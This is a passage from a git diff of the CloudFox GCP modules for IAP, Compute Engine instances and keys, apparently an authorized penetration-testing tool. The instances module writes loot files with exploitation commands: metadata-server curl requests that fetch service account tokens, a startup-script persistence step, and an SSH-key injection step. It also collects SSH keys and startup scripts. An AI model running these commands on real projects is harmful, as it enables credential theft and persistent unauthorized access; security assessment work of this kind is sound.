settings and bindings +- Identifies overly permissive tunnel configurations +- Checks for public access to IAP resources`, + Run: runGCPIAPCommand, +} + +type IAPModule struct { + gcpinternal.BaseGCPModule + TunnelDestGroups []iapservice.TunnelDestGroup + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type IAPOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAPOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAPOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPIAPCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAP_MODULE_NAME) + if err != nil { + return + } + + module := &IAPModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + TunnelDestGroups: []iapservice.TunnelDestGroup{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) + + if len(m.TunnelDestGroups) == 0 { + logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", + len(m.TunnelDestGroups)), globals.GCP_IAP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *IAPModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) + } + + svc := iapservice.New() + + // Get tunnel destination groups + groups, err := svc.ListTunnelDestGroups(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAP_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) + } else { + m.mu.Lock() + m.TunnelDestGroups = append(m.TunnelDestGroups, groups...) + for _, group := range groups { + m.addToLoot(group) + } + m.mu.Unlock() + } +} + +func (m *IAPModule) initializeLootFiles() { + m.LootMap["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *IAPModule) addToLoot(group iapservice.TunnelDestGroup) { + m.LootMap["iap-commands"].Contents += fmt.Sprintf( + "## Tunnel Destination Group: %s (Project: %s, Region: %s)\n"+ + "# CIDRs: %s\n"+ + "# FQDNs: %s\n\n"+ + "# Describe tunnel destination group:\n"+ + "gcloud iap tcp dest-groups describe %s --region=%s --project=%s\n\n"+ + "# List IAM policy for tunnel destination group:\n"+ + "gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s\n\n", + group.Name, group.ProjectID, group.Region, + strings.Join(group.CIDRs, ", "), + strings.Join(group.FQDNs, ", "), + group.Name, group.Region, group.ProjectID, + group.Name, group.Region, group.ProjectID, + ) +} + +func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Tunnel Destination Groups table with one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "CIDRs", + "FQDNs", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, group := range m.TunnelDestGroups { + // No truncation - show full content + cidrs := strings.Join(group.CIDRs, ", ") + if cidrs == "" { + cidrs = "-" + } + fqdns := strings.Join(group.FQDNs, ", ") + if fqdns == "" { + fqdns = "-" + } + + // If group has IAM bindings, create one row per binding + if len(group.IAMBindings) > 0 { + for _, binding := range group.IAMBindings { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.ProjectID, + group.Name, + group.Region, + cidrs, + fqdns, + "-", + "-", + }) + } + } + + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := IAPOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 79334951..af9d81b6 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,126 +1,590 @@ package commands import ( + "context" "fmt" + "strings" + "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPInstancesCommand = &cobra.Command{ - Use: globals.GCP_INSTANCES_MODULE_NAME, // This should be defined in the globals package - Aliases: []string{}, - Short: "Display GCP Compute Engine instances information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Compute Engine instances information: -cloudfox gcp instances`, + Use: globals.GCP_INSTANCES_MODULE_NAME, + Aliases: []string{"vms", "compute", "ssh", "oslogin"}, + Short: "Enumerate GCP Compute Engine instances with security configuration", + Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. + +Features: +- Lists all instances with network and security configuration +- Shows attached service accounts and their scopes +- Identifies instances with default service accounts or broad scopes +- Shows Shielded VM, Secure Boot, and Confidential VM status +- Shows OS Login configuration (enabled, 2FA, block project keys) +- Shows serial port and disk encryption configuration +- Extracts SSH keys from project and instance metadata +- Extracts startup scripts (may contain secrets) +- Generates gcloud commands for instance access and exploitation + +Security Columns: +- ExternalIP: Instances with external IPs are internet-accessible +- DefaultSA: Uses default compute service account (security risk) +- BroadScopes: Has cloud-platform or other broad OAuth scopes +- OSLogin: OS Login enabled (recommended for access control) +- OSLogin2FA: OS Login with 2FA required +- BlockProjKeys: Instance blocks project-wide SSH keys +- SerialPort: Serial port access enabled (security risk if exposed) +- CanIPForward: Can forward packets (potential for lateral movement) +- ShieldedVM/SecureBoot/vTPM/Integrity: Hardware security features +- Confidential: Confidential computing enabled +- Encryption: Boot disk encryption type (Google-managed, CMEK, CSEK)`, Run: runGCPInstancesCommand, } -// GCPInstancesResults implements internal.OutputInterface for Compute Engine instances -type GCPInstancesResults struct { - Data []ComputeEngineService.ComputeEngineInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type InstancesModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Instances []ComputeEngineService.ComputeEngineInfo + ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type InstancesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InstancesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InstancesOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPInstancesCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_INSTANCES_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &InstancesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []ComputeEngineService.ComputeEngineInfo{}, + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) + + // Check results + if len(m.Instances) == 0 { + logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_INSTANCES_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + + // Create service and fetch instances with project metadata + ces := ComputeEngineService.New() + instances, projectMeta, err := ces.InstancesWithMetadata(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_INSTANCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate instances in project %s", projectID)) + return + } + + // Thread-safe append + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + m.ProjectMetadata[projectID] = projectMeta + + // Generate loot for each instance + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + + // Add project metadata to loot + m.addProjectMetadataToLoot(projectMeta) + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *InstancesModule) initializeLootFiles() { + m.LootMap["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *InstancesModule) addProjectMetadataToLoot(meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# PROJECT-LEVEL METADATA (Project: %s)\n"+ + "# ==========================================\n"+ + "# OS Login: %v, OS Login 2FA: %v, Serial Port: %v\n", + meta.ProjectID, meta.OSLoginEnabled, meta.OSLogin2FAEnabled, meta.SerialPortEnabled, + ) + + // Project-level SSH keys + if meta.HasProjectSSHKeys && len(meta.ProjectSSHKeys) > 0 { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Project SSH Keys: %d (apply to ALL instances not blocking project keys)\n", + len(meta.ProjectSSHKeys), + ) + for _, key := range meta.ProjectSSHKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + } + } + + // Project-level startup script + if meta.HasProjectStartupScript && meta.ProjectStartupScript != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# PROJECT STARTUP SCRIPT (runs on ALL instances):\n"+ + "# ------- BEGIN -------\n"+ + "%s\n"+ + "# ------- END -------\n", + meta.ProjectStartupScript, + ) + } + + // Custom metadata keys at project level + if len(meta.CustomMetadataKeys) > 0 { + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + for _, key := range meta.CustomMetadataKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + } + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Get project metadata:\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n\n", + meta.ProjectID, + ) +} + +func (m *InstancesModule) addInstanceToLoot(instance ComputeEngineService.ComputeEngineInfo) { + // Build service account string + var saEmails []string + for _, sa := range instance.ServiceAccounts { + saEmails = append(saEmails, sa.Email) + } + saString := strings.Join(saEmails, ", ") + if saString == "" { + saString = "-" + } + + // External IP for display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "None" + } + + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ + "# ==========================================\n"+ + "# State: %s, Machine Type: %s\n"+ + "# External IP: %s, Internal IP: %s\n"+ + "# Service Account: %s\n"+ + "# Default SA: %v, Broad Scopes: %v\n"+ + "# OS Login: %v, OS Login 2FA: %v, Block Project Keys: %v\n"+ + "# Serial Port: %v, Shielded VM: %v, Secure Boot: %v\n", + instance.Name, instance.ProjectID, instance.Zone, + instance.State, instance.MachineType, + externalIP, instance.InternalIP, + saString, + instance.HasDefaultSA, instance.HasCloudScopes, + instance.OSLoginEnabled, instance.OSLogin2FAEnabled, instance.BlockProjectSSHKeys, + instance.SerialPortEnabled, instance.ShieldedVM, instance.SecureBoot, + ) + + // SSH keys on this instance + if len(instance.SSHKeys) > 0 { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) + for _, key := range instance.SSHKeys { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# %s\n", key) + } + } + + // Startup script content + if instance.StartupScriptContent != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "#\n# STARTUP SCRIPT (may contain secrets):\n"+ + "# ------- BEGIN -------\n"+ + "%s\n"+ + "# ------- END -------\n", + instance.StartupScriptContent, + ) + } + if instance.StartupScriptURL != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Startup Script URL: %s\n"+ + "# Fetch with: gsutil cat %s\n", + instance.StartupScriptURL, instance.StartupScriptURL, + ) + } + + // Custom metadata keys + if len(instance.CustomMetadata) > 0 { + m.LootMap["instances-commands"].Contents += "# Custom metadata keys (may contain secrets):\n" + for _, key := range instance.CustomMetadata { + m.LootMap["instances-commands"].Contents += fmt.Sprintf("# - %s\n", key) + } + } + + // Commands section + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ + "# Get serial port output:\n"+ + "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n"+ + "# Get metadata:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SSH commands + if instance.ExternalIP != "" { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# SSH (external IP):\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n"+ + "# Direct SSH (if OS Login disabled):\n"+ + "ssh -i ~/.ssh/google_compute_engine @%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.ExternalIP, + ) + } else { + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# SSH via IAP tunnel (no external IP):\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Exploitation commands + m.LootMap["instances-commands"].Contents += fmt.Sprintf( + "# Metadata from inside instance:\n"+ + "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+ + "# Get service account token:\n"+ + "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n"+ + "# Add startup script (persistence):\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Add SSH keys:\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata-from-file=ssh-keys=\n\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) +} + +// ------------------------------ +// Helper Functions +// ------------------------------ + +// SSHKeyParts contains parsed SSH key components +type SSHKeyParts struct { + Username string + KeyType string + KeyTruncated string + Comment string } -func (g GCPInstancesResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// parseSSHKeyLine parses a GCP SSH key line (format: user:ssh-rsa KEY comment) +func parseSSHKeyLine(line string) SSHKeyParts { + parts := SSHKeyParts{ + Username: "-", + KeyType: "-", + KeyTruncated: "-", + Comment: "", + } + + // Split on first colon to get username + colonIdx := strings.Index(line, ":") + if colonIdx > 0 { + parts.Username = line[:colonIdx] + line = line[colonIdx+1:] + } + // Split remaining by spaces: key-type KEY comment + fields := strings.Fields(line) + if len(fields) >= 1 { + parts.KeyType = fields[0] + } + if len(fields) >= 2 { + key := fields[1] + if len(key) > 20 { + parts.KeyTruncated = key[:10] + "..." + key[len(key)-10:] + } else { + parts.KeyTruncated = key + } + } + if len(fields) >= 3 { + parts.Comment = strings.Join(fields[2:], " ") + } + + return parts +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Single combined table with all security-relevant columns and IAM bindings header := []string{ + "Project Name", + "Project ID", "Name", - "ID", - "State", - "ExternalIP", - "InternalIP", - "ServiceAccount", // Adding ServiceAccount to the header "Zone", - "ProjectID", + "State", + "Machine Type", + "External IP", + "Internal IP", + "Service Account", + "Scopes", + "Default SA", + "Broad Scopes", + "OS Login", + "OS Login 2FA", + "Block Proj Keys", + "Serial Port", + "IP Forward", + "Shielded VM", + "Secure Boot", + "vTPM", + "Integrity", + "Confidential", + "Encryption", + "KMS Key", + "IAM Role", + "IAM Member", } var body [][]string - for _, instance := range g.Data { - // Initialize an empty string to aggregate service account emails - var serviceAccountEmails string - for _, serviceAccount := range instance.ServiceAccounts { - // Assuming each instance can have multiple service accounts, concatenate their emails - if serviceAccountEmails != "" { - serviceAccountEmails += "; " // Use semicolon as a delimiter for multiple emails - } - serviceAccountEmails += serviceAccount.Email + for _, instance := range m.Instances { + // Get first service account email (most instances have just one) + saEmail := "-" + scopes := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) + } + + // External IP display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + // Encryption display + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + + // KMS Key display + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" } - body = append(body, []string{ + // Base row data (reused for each IAM binding) + baseRow := []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, instance.Name, - instance.ID, + instance.Zone, instance.State, - instance.ExternalIP, + instance.MachineType, + externalIP, instance.InternalIP, - serviceAccountEmails, // Add the aggregated service account emails to the output - instance.Zone, - instance.ProjectID, - }) - } + saEmail, + scopes, + boolToYesNo(instance.HasDefaultSA), + boolToYesNo(instance.HasCloudScopes), + boolToYesNo(instance.OSLoginEnabled), + boolToYesNo(instance.OSLogin2FAEnabled), + boolToYesNo(instance.BlockProjectSSHKeys), + boolToYesNo(instance.SerialPortEnabled), + boolToYesNo(instance.CanIPForward), + boolToYesNo(instance.ShieldedVM), + boolToYesNo(instance.SecureBoot), + boolToYesNo(instance.VTPMEnabled), + boolToYesNo(instance.IntegrityMonitoring), + boolToYesNo(instance.ConfidentialVM), + encryption, + kmsKey, + } - tableFiles = append(tableFiles, internal.TableFile{ - Name: globals.GCP_INSTANCES_MODULE_NAME, - Header: header, - Body: body, - }) + // If instance has IAM bindings, create one row per binding + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + body = append(body, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + body = append(body, row) + } + } - return tableFiles -} + // SSH keys table (pentest-focused - keep separate) + sshKeysHeader := []string{ + "Project Name", + "Project ID", + "Source", + "Zone", + "Username", + "Key Type", + "Key (truncated)", + } -func (g GCPInstancesResults) LootFiles() []internal.LootFile { - // Define any loot files if applicable - return []internal.LootFile{} -} + var sshKeysBody [][]string -func runGCPInstancesCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_INSTANCES_MODULE_NAME) - return + // Add project-level SSH keys + for projectID, meta := range m.ProjectMetadata { + if meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + m.GetProjectName(projectID), + projectID, + "PROJECT", + "-", + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Add instance-level SSH keys + for _, instance := range m.Instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Zone, + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) + } + } } - ces := ComputeEngineService.New() - var results []ComputeEngineService.ComputeEngineInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - result, err := ces.Instances(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - cloudfoxOutput := GCPInstancesResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_INSTANCES_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return + // Collect loot files (only if content was added beyond header) + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM("Done writing output", globals.GCP_INSTANCES_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }, + } + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go new file mode 100644 index 00000000..4ae10519 --- /dev/null +++ b/gcp/commands/keys.go @@ -0,0 +1,415 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + hmacservice "github.com/BishopFox/cloudfox/gcp/services/hmacService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPKeysCommand = &cobra.Command{ + Use: globals.GCP_KEYS_MODULE_NAME, + Aliases: []string{"credentials", "creds", "access-keys"}, + Short: "Enumerate all GCP keys (SA keys, HMAC keys, API keys)", + Long: `Enumerate all types of GCP keys and credentials. + +Key Types: +- SA Keys: Service account RSA keys for OAuth 2.0 authentication +- HMAC Keys: S3-compatible access keys for Cloud Storage +- API Keys: Project-level keys for API access (Maps, Translation, etc.) + +Features: +- Unified view of all credential types +- Shows key age and expiration status +- Identifies Google-managed vs user-managed keys +- Generates exploitation commands for penetration testing`, + Run: runGCPKeysCommand, +} + +// UnifiedKeyInfo represents a key from any source +type UnifiedKeyInfo struct { + ProjectID string + KeyType string // "SA Key", "HMAC", "API Key" + KeyID string + Owner string // Email for SA/HMAC, "Project-level" for API keys + DisplayName string + Origin string // "Google Managed", "User Managed", "Service Account", "User", "-" + Algorithm string // Key algorithm (e.g., "KEY_ALG_RSA_2048") + State string // "ACTIVE", "INACTIVE", "DELETED", "DISABLED" + CreateTime time.Time + ExpireTime time.Time + Expired bool + DWDEnabled bool // For SA keys - whether the SA has Domain-Wide Delegation enabled + Restrictions string // For API keys only + KeyString string // For API keys only (if accessible) +} + +type KeysModule struct { + gcpinternal.BaseGCPModule + Keys []UnifiedKeyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type KeysOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o KeysOutput) TableFiles() []internal.TableFile { return o.Table } +func (o KeysOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPKeysCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_KEYS_MODULE_NAME) + if err != nil { + return + } + + module := &KeysModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Keys: []UnifiedKeyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) + + if len(m.Keys) == 0 { + logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) + return + } + + // Count by type + saKeyCount := 0 + hmacKeyCount := 0 + apiKeyCount := 0 + userManagedCount := 0 + + for _, key := range m.Keys { + switch key.KeyType { + case "SA Key": + saKeyCount++ + if key.Origin == "User Managed" { + userManagedCount++ + } + case "HMAC": + hmacKeyCount++ + case "API Key": + apiKeyCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", + len(m.Keys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) + } + + var projectKeys []UnifiedKeyInfo + + // 1. Enumerate Service Account Keys + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + } else { + for _, sa := range serviceAccounts { + // Check if DWD is enabled (OAuth2ClientID is set) + dwdEnabled := sa.OAuth2ClientID != "" + + for _, key := range sa.Keys { + // Extract key ID from full name + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + + origin := "Google Managed" + if key.KeyType == "USER_MANAGED" { + origin = "User Managed" + } + + state := "ACTIVE" + if key.Disabled { + state = "DISABLED" + } + + expired := false + if !key.ValidBefore.IsZero() && time.Now().After(key.ValidBefore) { + expired = true + } + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "SA Key", + KeyID: keyID, + Owner: sa.Email, + DisplayName: sa.DisplayName, + Origin: origin, + Algorithm: key.KeyAlgorithm, + State: state, + CreateTime: key.ValidAfter, + ExpireTime: key.ValidBefore, + Expired: expired, + DWDEnabled: dwdEnabled, + }) + } + } + } + + // 2. Enumerate HMAC Keys + hmacService := hmacservice.New() + hmacKeys, err := hmacService.ListHMACKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_KEYS_MODULE_NAME, + fmt.Sprintf("Could not enumerate HMAC keys in project %s", projectID)) + } else { + for _, key := range hmacKeys { + origin := "Service Account" + // Note: User HMAC keys are not enumerable via API, so all we see are SA keys + + projectKeys = append(projectKeys, UnifiedKeyInfo{ + ProjectID: projectID, + KeyType: "HMAC", + KeyID: key.AccessID, + Owner: 